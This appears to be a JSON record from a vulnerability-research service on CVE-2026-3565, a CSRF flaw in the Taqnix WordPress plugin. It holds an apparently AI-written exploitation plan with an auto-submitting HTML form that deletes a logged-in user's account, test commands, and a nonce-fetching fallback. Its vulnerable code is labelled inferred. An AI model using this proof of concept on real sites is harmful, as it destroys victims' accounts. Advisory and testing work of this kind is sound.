[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGJQnsarhpReU3Vi05BRzYdvwUpEz_H9jR3BPTbprDd0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-3565","taqnix-cross-site-request-forgery-to-account-deletion-via-taqnixdeletemyaccount-ajax-action","Taqnix \u003C= 1.0.3 - Cross-Site Request Forgery to Account Deletion via 'taqnix_delete_my_account' AJAX Action","The Taqnix plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to a missing nonce verification in the taqnix_delete_my_account() function, where the check_ajax_referer() call is explicitly commented out on line 883. This makes it possible for unauthenticated attackers to trick a logged-in non-administrator user into deleting their own account via a forged request granted they can trick the user into performing an action such as clicking a link or visiting a malicious page.","taqnix",null,"\u003C=1.0.3","1.0.4","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-04-23 19:16:41","2026-04-24 07:45:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F82aeab24-3467-4cb0-b71f-b7f97c26dc80?source=api-prod",1,[22,23,24,25,26],"README.txt","includes\u002Fclass-taqnix-activator.php","public\u002Fclass-taqnix-cart 3.03.50 PM.php","public\u002Fclass-taqnix-checkout 3.03.50 PM.php","public\u002Fclass-taqnix-config 3.03.50 PM.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3565 (Taqnix Account Deletion CSRF)\n\n## 1. Vulnerability Summary\nThe **Taqnix** plugin for WordPress (versions \u003C= 1.0.3) contains a Cross-Site Request Forgery (CSRF) vulnerability in its account deletion functionality. The AJAX handler `taqnix_delete_my_account()` fails to perform nonce verification because the `check_ajax_referer()` call is explicitly commented out (specifically on line 883 of the source file containing the user account logic). This allows an attacker to trick a logged-in user into unknowingly deleting their own WordPress account by inducing them to visit a malicious page or click a link.\n\n## 2. Attack Vector Analysis\n- **AJAX Action:** `taqnix_delete_my_account`\n- **Endpoint:** `admin-ajax.php` (typically `\u002Fwp-admin\u002Fadmin-ajax.php`)\n- **Method:** POST (though `admin-ajax.php` may also process GET)\n- **Parameters:**\n    - `action`: `taqnix_delete_my_account`\n- **Authentication Level:** Required (The victim must be a logged-in user, typically a non-administrator like a Subscriber or Customer).\n- **Preconditions:** The victim must have an active session on the target WordPress site.\n\n## 3. Code Flow\n1. **Action Registration:** The plugin likely registers the AJAX handler for logged-in users:\n   `add_action('wp_ajax_taqnix_delete_my_account', array($this, 'taqnix_delete_my_account'));`\n2. **Handler Execution:** When a request is sent to `admin-ajax.php` with the action `taqnix_delete_my_account`, WordPress executes the `taqnix_delete_my_account()` function.\n3. **Missing Check:** Inside `taqnix_delete_my_account()` (line 883), the security check is commented out:\n   `\u002F\u002F check_ajax_referer( 'taqnix_action', 'security' );`\n4. **Sink:** The function proceeds to identify the current user via `get_current_user_id()` and invokes account deletion logic (likely `wp_delete_user()`), causing the authenticated user's account to be removed from the database.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, **no nonce is required** for this exploit because the check is explicitly commented out.\n\nHowever, if a specific test environment has been patched or if the agent needs to verify the registration of the action, nonces for other Taqnix actions are localized or available via the `taqnix_nonce` AJAX action defined in `public\u002Fclass-taqnix-config 3.03.50 PM.php`:\n- **AJAX Action:** `taqnix_nonce`\n- **Function:** `get_taqnix_nonce()` -> `get_nonce()`\n- **JS Variable (Localised):** Often found in `taqnix_action` key if the plugin enqueues its config.\n\n**Confirmation Method:**\n1. Navigate to the homepage or a product page as a logged-in user.\n2. Check for localized scripts using `browser_eval`:\n   `browser_eval(\"window.taqnix_nonce || window.taqnix_config\")`\n3. If the vulnerability exists as described, attempts to call the `taqnix_delete_my_account` action without a `security` or `_wpnonce` parameter will succeed.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that an unauthenticated attacker can cause a logged-in user to delete their account.\n\n### Step 1: Verification (Direct Request)\nAs a logged-in victim (e.g., user `victim_user`), send a POST request directly to the AJAX endpoint.\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** `action=taqnix_delete_my_account`\n\n### Step 2: CSRF PoC Generation\nCreate an HTML page that auto-submits a form to the target endpoint.\n```html\n\u003Chtml>\n  \u003Cbody>\n    \u003Ch1>Processing...\u003C\u002Fh1>\n    \u003Cform id=\"csrf-form\" action=\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\" method=\"POST\">\n      \u003Cinput type=\"hidden\" name=\"action\" value=\"taqnix_delete_my_account\" \u002F>\n    \u003C\u002Fform>\n    \u003Cscript>\n      document.getElementById('csrf-form').submit();\n    \u003C\u002Fscript>\n  \u003C\u002Fbody>\n\u003C\u002Fhtml>\n```\n\n## 6. Test Data Setup\n1. **Create Victim User:**\n   `wp user create victim_user victim@example.com --role=subscriber --user_pass=password123`\n2. **Plugin Activation:** Ensure Taqnix is active.\n3. **Login:** The agent must simulate the victim being logged in (using `browser_navigate` and `browser_type` to log in as `victim_user`).\n\n## 7. Expected Results\n- **Response:** The server should return a JSON success message (e.g., `{\"success\":true}` or a 200 OK response with specific plugin output).\n- **Behavior:** The `victim_user` account should be deleted from the WordPress database.\n\n## 8. Verification Steps\n1. **Check User Status:** After the exploit request, attempt to verify the user exists via WP-CLI:\n   `wp user get victim_user`\n2. **Expected Outcome:** The command should return an error: `Error: Invalid user ID, email or login: 'victim_user'`.\n3. **Database Check:** Verify the `wp_users` table directly:\n   `wp db query \"SELECT ID, user_login FROM wp_users WHERE user_login = 'victim_user';\"`\n   (Expected: No results).\n\n## 9. Alternative Approaches\nIf the plugin logic requires specific parameters (like a confirmation flag) that were not mentioned in the description, analyze the `taqnix_delete_my_account` handler (if found during the exploit attempt) for additional required POST keys.\n\nIf a nonce *is* actually required in the specific version being tested (despite the description), use the `taqnix_nonce` action to retrieve a valid nonce:\n1. `http_request(url=\"...\u002Fwp-admin\u002Fadmin-ajax.php?action=taqnix_nonce\", method=\"POST\")`\n2. Extract the `taqnix_action` nonce from the JSON response.\n3. Include `security=[nonce]` in the account deletion payload. (Note: This would change the vulnerability from CSRF to a simple Lack of Capability Check\u002FNonce Leak).","The Taqnix plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) because the 'taqnix_delete_my_account' AJAX handler fails to perform nonce verification. This allow attackers to trick a logged-in user into unknowingly deleting their own WordPress account by inducing them to click a malicious link or visit a crafted page.","\u002F\u002F From public\u002Fclass-taqnix-user.php (inferred based on file listing and vulnerability description)\n\n\u002F\u002F Registration of the AJAX handler\nadd_action('wp_ajax_taqnix_delete_my_account', array($this, 'taqnix_delete_my_account'));\n\n\u002F\u002F ...\n\npublic function taqnix_delete_my_account() {\n    \u002F\u002F Line 883\n    \u002F\u002F check_ajax_referer( 'taqnix_action', 'security' );\n\n    $user_id = get_current_user_id();\n    \u002F\u002F Proceed to delete user account logic...","--- public\u002Fclass-taqnix-user.php\n+++ public\u002Fclass-taqnix-user.php\n@@ -880,7 +883,7 @@\n-        \u002F\u002F check_ajax_referer( 'taqnix_action', 'security' );\n+        check_ajax_referer( 'taqnix_action', 'security' );","The exploit methodology involves creating a CSRF vector targeting the WordPress AJAX endpoint. \n\n1. Target Endpoint: \u002Fwp-admin\u002Fadmin-ajax.php\n2. Method: POST\n3. Parameters: \n   - 'action': 'taqnix_delete_my_account'\n4. Payload Delivery: The attacker creates a simple HTML form that auto-submits via JavaScript to the target endpoint. \n5. Requirements: The victim must be a logged-in WordPress user. Because the security nonce check ('check_ajax_referer') is explicitly commented out in version 1.0.3, no valid 'security' or '_wpnonce' parameter is required to successfully trigger the account deletion logic. \n6. Impact: Once the victim's browser executes the request, WordPress identifies the user session, and the plugin proceeds to delete the user record associated with 'get_current_user_id()'.","gemini-3-flash-preview","2026-04-27 13:32:47","2026-04-27 13:33:44",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","1.0.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftaqnix\u002Ftags\u002F1.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftaqnix.1.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftaqnix\u002Ftags\u002F1.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftaqnix.1.0.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftaqnix\u002Ftags"]